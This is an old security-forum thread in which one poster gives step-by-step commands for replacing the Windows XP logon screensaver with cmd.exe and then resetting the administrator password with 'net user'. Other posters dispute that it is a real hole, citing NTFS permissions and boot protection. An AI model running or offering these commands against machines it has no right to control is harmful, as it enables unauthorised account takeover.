Another logon.scr Admin Hole + FIX

[Szafran]

WOW windows sux.... Lol so many logon holes. Here is another.
I Belive that this is only for XP
I also belive that this a very well know hole but i decided to post it for the people who have never heard of it.

How it works.
When your PC on a logon screen and nothing is done for 10-15 minutes a LOGON SCREENSAVER is executed. What can happen is a user can replace that LOGON SCREENSAVER with the DOS PROMPT. What this will do is instead of running the screensave it will display the command prompt. Through the prompt they can easily change the ADMIN password and logon under that name.

HOW IT IS DONE
RUN>>COMMAND
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now all they would have to do is logoff the machine, wait 10-15 minutes then the DOS PROMPT should execute.
Lastly all they have to do is type "C:\> net user administrator <newpassword> " in the prompt and log in with the new account.

*FIX* change default permissions on C:\winnt and C:\winnt\system32 you should be golden.

[slarty]

Firstly old news,
Secondly it isn't a security hole.

In order to replace logon.scr, you require admin rights, because the default ACL in Windows NT (And 2000, XP etc) only allows administrators and system write access.
If you had admin rights, then you can obtain localsystem privileges easily anyway.

So it just isn't an issue.

Unless you're using fat32. If that is the case however, there are probably easier ways of getting localsystem rights.

Slarty

[nihil]

Szafran,

With the greatest respect, windows does not suck!

The truth is that the Earth sucks, and that gravity is a myth...........

All operating systems have their flaws, but the worst flaws must be in the humans who find and exploit them?

I guess if you can guarantee 5 minutes, either physical or firewall security should have caught it?

That is where I feel that your security lies...you can only buy time...just like security on an automobile?

just my £ 0.02 worth

[Szafran]

lol, i didn't mean it like that, sorry, i meant its so much more unsecure then linux. And the reason i posted is was because at my school you do not need ADMIN right to change files such as LOGON.SCR if you boot with a floppy.

so in response to

Firstly old news,
Secondly it isn't a security hole.

It may not be new but it is still a a security hole. And incase you missed my last message. If they boot with a floppy or CD in DOS then is it very possible to alter any file in the windows DIR includeing LOGON.SCR.

PS thanx for the NEG Points

[catch]

lol, i didn't mean it like that, sorry, i meant its so much more unsecure then linux.

Just stop talking before I really start to flame you.

I have read a few of your posts now and it is obvious that you are quite new to computers and computer security, so if you'd like to be welcome here I think you would do better _asking_ and not telling.

catch

[Szafran]

actually i'm quite fluent in computers but my posts and been written so that the least fluent user can understand.

and just to let everyone know i just triend this on my other PC and it did work w/ a boot disk. So unless you have bootdisk disabeled then you might want to look into this.

[catch]

You other post about any user being able to change the admin password belays your level of fluency.

As for this one, if the system is improperly protected against alternate boots, this screen saver crap is the least of your worries.

catch

[Szafran]

well the admin pass can be easilt changed with the NET USER Command

[|The|Specialist]

Originally posted here by Szafran
lol, i didn't mean it like that, sorry, i meant its so much more unsecure then linux.

I have no problem with your personal feelings towards windows and M$... But with this post however... actually your wrong esspecially considering probably about half of the windows users out there are home users and there are many who know very little or nothing at all about their own computers. One of the main reasons its such a popular target is because its so wide spread. Also what many peaple don't realize is linux may not be the bigest target when it comes to virii but what it lacks in that it makes up for with a fair share of exploits...

Originally posted here by Szafran
my posts and been written so that the least fluent user can understand.

Is that a insult or just more excuses on your part?

[slarty]

It may not be new but it is still a a security hole.

No it is not.

And incase you missed my last message. If they boot with a floppy or CD in DOS then is it very possible to alter any file in the windows DIR includeing LOGON.SCR.

No, DOS does not understand NTFS, hence will not be able to see the NT partition at all. If you use FAT the system is inherently insecure, AS MICROSOFT FREELY ADMIT and thus don't recommend you use FAT on your system drive.

Of course if you can boot off a CD or floppy full access is easily obtainable anyway, but I won't tell you how because you're a lamer.

PS thanx for the NEG Points

If you want to post up inaccurate duplicate out of date info, you should expect more

Slarty